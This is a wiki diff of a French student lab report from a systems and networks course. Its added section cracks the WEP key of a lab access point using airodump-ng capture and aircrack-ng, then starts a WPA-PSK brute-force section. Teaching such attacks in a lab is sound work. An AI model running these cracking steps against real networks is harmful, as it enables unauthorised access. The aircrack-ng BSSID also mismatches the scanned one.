« Atelier SysRes SE4 2025/2026 E10 » : différence entre les versions
(Page créée avec « == Machines virtuelles == == Configuration réseau == == DNS/DNSSEC == == Serveur Apache == == Fail2Ban == == Effraction WiFi == == Sécurisation et accès WiFi par WPA2-EAP == ») |
|||
| Ligne 10 : | Ligne 10 : | ||
== Effraction WiFi == | == Effraction WiFi == | ||
=== Cassage de clef WEP d’un point d’accès WiFi === | |||
==== Adresse MAC de cracotte10 ==== | |||
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser <code>airodump-ng</code>. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via <code>ip link</code>. | |||
J'obtiens alors <code>wlan0</code>, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le <code>wlx40a5efd2140c</code> | |||
Ensuite, on scanne grâce à: | |||
<code>sudo airodump-ng wlx40a5efd2140c --essid cracotte10</code> | |||
Nous obtenons :<syntaxhighlight> | |||
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID | |||
04:DA:D2:9C:50:59 -69 2 1 0 4 54e. WEP WEP cracotte10 | |||
BSSID STATION PWR Rate Lost Frames Notes Probes | |||
</syntaxhighlight>L'adresse MAC de cracotte10 est donc | |||
<code>04:DA:D2:9C:50:59</code> | |||
==== Récupération de données ==== | |||
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier <code>.cap</code> | |||
<code>sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump</code> | |||
==== Cassage de la clef WEP ==== | |||
Pendant que le fichier se remplit, | |||
<code>sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap</code> | |||
=== Cassage de mot de passe WPA-PSK par force brute === | |||
==== Adresse MAC de kracotte10 ==== | |||
<code>44:AD:D9:5F:87:09 -72 3 0 0 13 54e. WPA2 CCMP PSK kracotte10</code> | |||
== Sécurisation et accès WiFi par WPA2-EAP == | == Sécurisation et accès WiFi par WPA2-EAP == | ||
Version du 10 février 2026 à 17:19
Machines virtuelles
Configuration réseau
DNS/DNSSEC
Serveur Apache
Fail2Ban
Effraction WiFi
Cassage de clef WEP d’un point d’accès WiFi
Adresse MAC de cracotte10
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser airodump-ng. Pour ce faire, nous devons tout d'abord trouver le nom de la carte réseau. On peut trouver cela via ip link.
J'obtiens alors wlan0, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le wlx40a5efd2140c
Ensuite, on scanne grâce à:
sudo airodump-ng wlx40a5efd2140c --essid cracotte10
Nous obtenons :
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
04:DA:D2:9C:50:59 -69 2 1 0 4 54e. WEP WEP cracotte10
BSSID STATION PWR Rate Lost Frames Notes ProbesL'adresse MAC de cracotte10 est donc
04:DA:D2:9C:50:59
Récupération de données
Une fois l'adresse mac et le canal récupérés, nous pouvons récupérer un flux de données qui sera stocké dans un fichier .cap
sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump
Cassage de la clef WEP
Pendant que le fichier se remplit,
sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap
Cassage de mot de passe WPA-PSK par force brute
Adresse MAC de kracotte10
44:AD:D9:5F:87:09 -72 3 0 0 13 54e. WPA2 CCMP PSK kracotte10